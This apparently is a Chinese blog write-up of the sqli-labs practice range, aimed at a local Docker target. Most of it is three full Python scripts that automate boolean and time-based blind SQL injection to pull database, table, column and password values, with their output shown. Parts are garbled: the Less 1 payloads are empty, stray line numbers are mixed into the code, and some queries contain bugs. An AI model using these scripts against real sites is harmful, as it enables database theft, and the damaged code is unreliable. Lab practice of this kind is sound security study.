sqli-lab

前言

学了一段时间的web了,最近决定把几个靶场打一打,比如说sql注入,SSTI,XXE,XSS啥的。靶场的搭建采用docker直接pull的方式,简单又快捷,五分钟即可进入靶场,谁用谁知道。

sqli-labs

less 1

字符型注入,直接打:

payload:

payload:

payload:

  • 判断盲注
    http://127.0.0.1/Less-5/?id=1%27%20and%201=1%23 回显You are in
    http://127.0.0.1/Less-5/?id=1%27%20and%201=2%23 无回显
    判断为盲注
    爆库名长度、爆库名、爆表名长度、爆表名、爆字段长度、爆字段、爆数据长度、爆数据,脚本如下:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    140
    141
    142
    143
    144
    145
    146
    147
    148
    149
    150
    151
    152
    153
    154
    155
    156
    157
    158
    159
    160
    161
    162
    163
    164
    165
    166
    167
    168
    169
    170
    171
    172
    173
    174
    175
    176
    177
    178
    179
    180
    181
    182
    183
    184
    185
    186
    187
    188
    189
    190
    191
    192
    from requests import *

    url="http://127.0.0.1/Less-5/"

    def get_db_len(url): #获取当前数据库长度
    left=0
    right=100
    while left<right:
    mid=(left+right)//2
    payload=url+f"?id=1' and length(database())>{mid}%23"
    response=get(payload)
    if 'You are in' in response.text:
    left=mid+1
    else:
    right=mid
    judge=url+f"?id=1' and length(database())={left}%23"
    response=get(judge)
    if 'You are in' in response.text:
    mid=left
    else:
    mid=right
    return mid

    def get_table_len(url,index): #获取当前数据库第index个表的长度
    left=0
    right=100
    while left<right:
    mid=(left+right)//2
    payload=url+f"?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit {index},1))>{mid}%23"
    response=get(payload)
    if 'You are in' in response.text:
    left=mid+1
    else:
    right=mid
    judge=url+f"?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit {index},1))={left}%23"
    response=get(judge)
    if 'You are in' in response.text:
    mid=left
    else:
    mid=right
    return mid

    def get_column_len(url,index1,index2): #获取数据库第index1个表的第index2个字段的长度
    left=0
    right=100
    table_name=get_table_name(url,index1)
    while left<right:
    mid=(left+right)//2
    payload=url+f"?id=1' and length((select column_name from information_schema.columns where table_name='{table_name}' limit {index2},1))>{mid}%23"
    response=get(payload)

    if 'You are in' in response.text:
    left=mid+1
    else:
    right=mid
    judge=url+f"?id=1' and length((select column_name from information_schema.columns where table_name='{table_name}' limit {index2},1))={left}%23"
    response=get(judge)
    if 'You are in' in response.text:
    mid=left
    else:
    mid=right
    return mid

    def get_data_len(url,index1,index2,index3): ##获取数据库第index1个表的第index2个字段的第index3个数据
    table_name=get_table_name(url,index1)
    column_name=get_column_name(url,index1,index2)
    left=0
    right=100
    while left<right:
    mid=(left+right)//2
    payload=url+f"?id=1' and length((select {column_name} from {table_name} limit {index3},1))>{mid}%23"
    response=get(payload)
    if 'You are in' in response.text:
    left=mid+1
    else:
    right=mid
    judge=url+f"?id=1' and length((select {column_name} from {table_name} limit {index3},1))={left}%23"
    response=get(judge)
    if 'You are in' in response.text:
    mid=left
    else:
    mid=right
    return mid


    def get_db_name(url,db_len): #获取当前数据库名
    db_name=''
    for i in range(1,db_len+1):
    left=32
    right=128
    while left<right:
    mid=(left+right)//2
    payload=url+f"?id=1' and ascii(substr((select database()),{i},1))>{mid}%23"
    response=get(payload)
    if 'You are in' in response.text:
    left=mid+1
    else:
    right=mid
    judge=url+f"?id=1' and ascii(substr((select database()),{i},1))={left}%23"
    response=get(judge)
    if 'You are in' in response.text:
    mid=left
    else:
    mid=right
    db_name+=chr(mid)
    return db_name

    def get_table_name(url,index): #获取第index个数据表表名
    table_len=get_table_len(url,index)
    table_name=''
    for i in range(1,table_len+1):
    left=32
    right=128
    while left<right:
    mid=(left+right)//2
    payload=url+f"?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {index},1),{i},1))>{mid}%23"
    response=get(payload)
    if 'You are in' in response.text:
    left=mid+1
    else:
    right=mid
    judge=url+f"?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {index},1),{i},1)={left}%23"
    response=get(judge)
    if 'You are in' in response.text:
    mid=left
    else:
    mid=right
    table_name+=chr(mid)
    return table_name

    def get_column_name(url,index1,index2): #获取数据库第index1个表的第index2个字段的长度
    column_len=get_column_len(url,index1,index2)
    table_name=get_table_name(url,index1)
    column_name=''
    for i in range(1,column_len+1):
    left=32
    right=128
    while left<right:
    mid=(left+right)//2
    payload=url+f"?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='{table_name}' limit {index2},1),{i},1))>{mid}%23"
    response=get(payload)
    if 'You are in' in response.text:
    left=mid+1
    else:
    right=mid
    judge=url+f"?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='{table_name}' limit {index2},1),{i},1))={left}%23"
    response=get(judge)
    if 'You are in' in response.text:
    mid=left
    else:
    mid=right
    column_name+=chr(mid)
    return column_name

    def get_data(url,index1,index2,index3): #获取数据库第index1个表的第index2个字段的第index3个数据
    data_len=get_data_len(url,index1,index2,index3)
    column_name=get_column_name(url,index1,index2)
    table_name=get_table_name(url,index1)
    data=''
    for i in range(1,data_len+1):
    left=32
    right=128
    while left<right:
    mid=(left+right)//2
    payload=url+f"?id=1' and ascii(substr((select {column_name} from {table_name} limit {index3},1),{i},1))>{mid}%23"
    response=get(payload)
    if 'You are in' in response.text:
    left=mid+1
    else:
    right=mid
    judge=url+f"?id=1' and ascii(substr((select {column_name} from {table_name} limit {index3},1),{i},1))={left}%23"
    response=get(judge)
    if 'You are in' in response.text:
    mid=left
    else:
    mid=right
    data+=chr(mid)
    return data

    index1=3
    index2=2
    index3=1
    print(get_db_name(url,get_db_len(url)))
    print(get_table_name(url,index1))
    print(get_column_name(url,index1,index2))
    print(get_data(url,index1,index2,index3))
    '''
    security
    users
    password
    p@ssword
    '''

    less 6

    less 5的单引号变成双引号,直接上脚本:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    140
    141
    142
    143
    144
    145
    146
    147
    148
    149
    150
    151
    152
    153
    154
    155
    156
    157
    158
    159
    160
    161
    162
    163
    164
    165
    166
    167
    168
    169
    170
    171
    172
    173
    174
    175
    176
    177
    178
    179
    180
    181
    182
    183
    184
    185
    186
    187
    188
    189
    190
    191
    from requests import *

    url="http://127.0.0.1/Less-6/"

    def get_db_len(url): #获取当前数据库长度
    left=0
    right=100
    while left<right:
    mid=(left+right)//2
    payload=url+f"?id=1\" and length(database())>{mid}%23"
    response=get(payload)
    if 'You are in' in response.text:
    left=mid+1
    else:
    right=mid
    judge=url+f"?id=1\" and length(database())={left}%23"
    response=get(judge)
    if 'You are in' in response.text:
    mid=left
    else:
    mid=right
    return mid

    def get_table_len(url,index): #获取当前数据库第index个表的长度
    left=0
    right=100
    while left<right:
    mid=(left+right)//2
    payload=url+f"?id=1\" and length((select table_name from information_schema.tables where table_schema=database() limit {index},1))>{mid}%23"
    response=get(payload)
    if 'You are in' in response.text:
    left=mid+1
    else:
    right=mid
    judge=url+f"?id=1\" and length((select table_name from information_schema.tables where table_schema=database() limit {index},1))={left}%23"
    response=get(judge)
    if 'You are in' in response.text:
    mid=left
    else:
    mid=right
    return mid

    def get_column_len(url,index1,index2): #获取数据库第index1个表的第index2个字段的长度
    left=0
    right=100
    table_name=get_table_name(url,index1)
    while left<right:
    mid=(left+right)//2
    payload=url+f"?id=1\" and length((select column_name from information_schema.columns where table_name='{table_name}' limit {index2},1))>{mid}%23"
    response=get(payload)

    if 'You are in' in response.text:
    left=mid+1
    else:
    right=mid
    judge=url+f"?id=1\" and length((select column_name from information_schema.columns where table_name='{table_name}' limit {index2},1))={left}%23"
    response=get(judge)
    if 'You are in' in response.text:
    mid=left
    else:
    mid=right
    return mid

    def get_data_len(url,index1,index2,index3): ##获取数据库第index1个表的第index2个字段的第index3个数据
    table_name=get_table_name(url,index1)
    column_name=get_column_name(url,index1,index2)
    left=0
    right=100
    while left<right:
    mid=(left+right)//2
    payload=url+f"?id=1\" and length((select {column_name} from {table_name} limit {index3},1))>{mid}%23"
    response=get(payload)
    if 'You are in' in response.text:
    left=mid+1
    else:
    right=mid
    judge=url+f"?id=1\" and length((select {column_name} from {table_name} limit {index3},1))={left}%23"
    response=get(judge)
    if 'You are in' in response.text:
    mid=left
    else:
    mid=right
    return mid


    def get_db_name(url,db_len): #获取当前数据库名
    db_name=''
    for i in range(1,db_len+1):
    left=32
    right=128
    while left<right:
    mid=(left+right)//2
    payload=url+f"?id=1\" and ascii(substr((select database()),{i},1))>{mid}%23"
    response=get(payload)
    if 'You are in' in response.text:
    left=mid+1
    else:
    right=mid
    judge=url+f"?id=1\" and ascii(substr((select database()),{i},1))={left}%23"
    response=get(judge)
    if 'You are in' in response.text:
    mid=left
    else:
    mid=right
    db_name+=chr(mid)
    return db_name

    def get_table_name(url,index): #获取第index个数据表表名
    table_len=get_table_len(url,index)
    table_name=''
    for i in range(1,table_len+1):
    left=32
    right=128
    while left<right:
    mid=(left+right)//2
    payload=url+f"?id=1\" and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {index},1),{i},1))>{mid}%23"
    response=get(payload)
    if 'You are in' in response.text:
    left=mid+1
    else:
    right=mid
    judge=url+f"?id=1\" and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {index},1),{i},1)={left}%23"
    response=get(judge)
    if 'You are in' in response.text:
    mid=left
    else:
    mid=right
    table_name+=chr(mid)
    return table_name

    def get_column_name(url,index1,index2): #获取数据库第index1个表的第index2个字段的长度
    column_len=get_column_len(url,index1,index2)
    table_name=get_table_name(url,index1)
    column_name=''
    for i in range(1,column_len+1):
    left=32
    right=128
    while left<right:
    mid=(left+right)//2
    payload=url+f"?id=1\" and ascii(substr((select column_name from information_schema.columns where table_name='{table_name}' limit {index2},1),{i},1))>{mid}%23"
    response=get(payload)
    if 'You are in' in response.text:
    left=mid+1
    else:
    right=mid
    judge=url+f"?id=1\" and ascii(substr((select column_name from information_schema.columns where table_name='{table_name}' limit {index2},1),{i},1))={left}%23"
    response=get(judge)
    if 'You are in' in response.text:
    mid=left
    else:
    mid=right
    column_name+=chr(mid)
    return column_name

    def get_data(url,index1,index2,index3): #获取数据库第index1个表的第index2个字段的第index3个数据
    data_len=get_data_len(url,index1,index2,index3)
    column_name=get_column_name(url,index1,index2)
    table_name=get_table_name(url,index1)
    data=''
    for i in range(1,data_len+1):
    left=32
    right=128
    while left<right:
    mid=(left+right)//2
    payload=url+f"?id=1\" and ascii(substr((select {column_name} from {table_name} limit {index3},1),{i},1))>{mid}%23"
    response=get(payload)
    if 'You are in' in response.text:
    left=mid+1
    else:
    right=mid
    judge=url+f"?id=1\" and ascii(substr((select {column_name} from {table_name} limit {index3},1),{i},1))={left}%23"
    response=get(judge)
    if 'You are in' in response.text:
    mid=left
    else:
    mid=right
    data+=chr(mid)
    return data

    index1=3
    index2=2
    index3=2
    print(get_db_name(url,get_db_len(url)))
    print(get_table_name(url,index1))
    print(get_column_name(url,index1,index2))
    print(get_data(url,index1,index2,index3))
    '''security
    users
    password
    p@ssword
    '''

less 9

时间盲注,大致思路与布尔盲注差不多,只需要修改一下payload就行,脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
from requests import *
from time import time

url="http://127.0.0.1/Less-9/"

def get_db_len(url): #获取当前数据库长度
left=0
right=100
while left<right:
mid=(left+right)//2
payload=url+f"?id=1' and if(length(database())>{mid},sleep(0.1),0)%23"
before=time()
response=get(payload)
after=time()
if after-before>=0.1:
left=mid+1
else:
right=mid
t1=time()
judge=url+f"?id=1' and if(length(database())={left},sleep(0.1),0)%23"
response=get(judge)
t2=time()
if t2-t1>=0.1:
mid=left
else:
mid=right
return mid

def get_table_len(url,index): #获取当前数据库第index个表的长度
left=0
right=100
while left<right:
mid=(left+right)//2
t1=time()
payload=url+f"?id=1' and if(length((select table_name from information_schema.tables where table_schema=database() limit {index},1))>{mid},sleep(0.1),0)%23"
response=get(payload)
t2=time()
if t2-t1>=0.1:
left=mid+1
else:
right=mid
t1=time()
judge=url+f"?id=1' and if(length((select table_name from information_schema.tables where table_schema=database() limit {index},1))={left},sleep(0.1),0)%23"
response=get(judge)
t2=time()
if t2-t1>=0.1:
mid=left
else:
mid=right
return mid

def get_column_len(url,index1,index2): #获取数据库第index1个表的第index2个字段的长度
left=0
right=100
table_name=get_table_name(url,index1)
while left<right:
mid=(left+right)//2
t1=time()
payload=url+f"?id=1' and if(length((select column_name from information_schema.columns where table_name='{table_name}' limit {index2},1))>{mid},sleep(0.1),0)%23"
response=get(payload)
t2=time()
if t2-t1:
left=mid+1
else:
right=mid
t1=time()
judge=url+f"?id=1' and if(length((select column_name from information_schema.columns where table_name='{table_name}' limit {index2},1))={left},sleep(0.1),0)%23"
response=get(judge)
t2=time()
if t2-t1>=0.1:
mid=left
else:
mid=right
return mid

def get_data_len(url,index1,index2,index3): ##获取数据库第index1个表的第index2个字段的第index3个数据
table_name=get_table_name(url,index1)
column_name=get_column_name(url,index1,index2)
left=0
right=100
while left<right:
mid=(left+right)//2
t1=time()
payload=url+f"?id=1' and if(length((select {column_name} from {table_name} limit {index3},1))>{mid},sleep(0.1),0)%23"
response=get(payload)
t2=time()
if t2-t1>=0.1:
left=mid+1
else:
right=mid
t1=time()
judge=url+f"?id=1' and if(length((select {column_name} from {table_name} limit {index3},1))={left},sleep(0.1),0)%23"
response=get(judge)
t2=time()
if t2-t1>=0.1:
mid=left
else:
mid=right
return mid


def get_db_name(url,db_len): #获取当前数据库名
db_name=''
for i in range(1,db_len+1):
left=32
right=128
while left<right:
mid=(left+right)//2
t1=time()
payload=url+f"?id=1' and if(ascii(substr((select database()),{i},1))>{mid},sleep(0.1),0)%23"
response=get(payload)
t2=time()
if t2-t1>=0.1:
left=mid+1
else:
right=mid
t1=time()
judge=url+f"?id=1' and if(ascii(substr((select database()),{i},1))={left},sleep(0,1),0)%23"
response=get(judge)
t2=time()
if t2-t1>=0.1:
mid=left
else:
mid=right
db_name+=chr(mid)
return db_name

def get_table_name(url,index): #获取第index个数据表表名
table_len=get_table_len(url,index)
table_name=''
for i in range(1,table_len+1):
left=32
right=128
while left<right:
mid=(left+right)//2
t1=time()
payload=url+f"?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {index},1),{i},1))>{mid},sleep(0.1),0)%23"
response=get(payload)
t2=time()
if t2-t1>=0.1:
left=mid+1
else:
right=mid
t1=time()
judge=url+f"?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {index},1),{i},1)={left},sleep(0.1),0)%23"
response=get(judge)
t2=time()
if t2-t1>=0.1:
mid=left
else:
mid=right
table_name+=chr(mid)
return table_name

def get_column_name(url,index1,index2): #获取数据库第index1个表的第index2个字段的长度
column_len=get_column_len(url,index1,index2)
table_name=get_table_name(url,index1)
column_name=''
for i in range(1,column_len+1):
left=32
right=128
while left<right:
mid=(left+right)//2
t1=time()
payload=url+f"?id=1' and if(ascii(substr((select column_name from information_schema.columns where table_name='{table_name}' limit {index2},1),{i},1))>{mid},sleep(0.1),0)%23"
response=get(payload)
t2=time()
if t2-t1>=0.1:
left=mid+1
else:
right=mid
t1=time()
judge=url+f"?id=1' and if(ascii(substr((select column_name from information_schema.columns where table_name='{table_name}' limit {index2},1),{i},1))={left},sleep(0.1),0)%23"
response=get(judge)
t2=time()
if t2-t1>=0.1:
mid=left
else:
mid=right
column_name+=chr(mid)
return column_name

def get_data(url,index1,index2,index3): #获取数据库第index1个表的第index2个字段的第index3个数据
data_len=get_data_len(url,index1,index2,index3)
column_name=get_column_name(url,index1,index2)
table_name=get_table_name(url,index1)
data=''
for i in range(1,data_len+1):
left=32
right=128
while left<right:
mid=(left+right)//2
t1=time()
payload=url+f"?id=1' and if(ascii(substr((select {column_name} from {table_name} limit {index3},1),{i},1))>{mid},sleep(0.1),0)%23"
response=get(payload)
t2=time()
if t2-t1>=0.1:
left=mid+1
else:
right=mid
t1=time()
judge=url+f"?id=1' and if(ascii(substr((select {column_name} from {table_name} limit {index3},1),{i},1))={left},sleep(0.1),0)%23"
response=get(judge)
t2=time()
if t2-t1>=0.1:
mid=left
else:
mid=right
data+=chr(mid)
return data

index1=3
index2=2
index3=2
print(get_db_name(url,get_db_len(url)))
print(get_table_name(url,index1))
print(get_column_name(url,index1,index2))
print(get_data(url,index1,index2,index3))
'''
security
users
password
p@ssword
'''

结语

sqli-lab的初步学习暂时就到这里,等以后学深了再学一学后面的cookie注入和二次注入吧。sql注入的入门暂时告一段落,接下来还会推出SSTI,XSS,XXE等靶场的入门文章。


本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!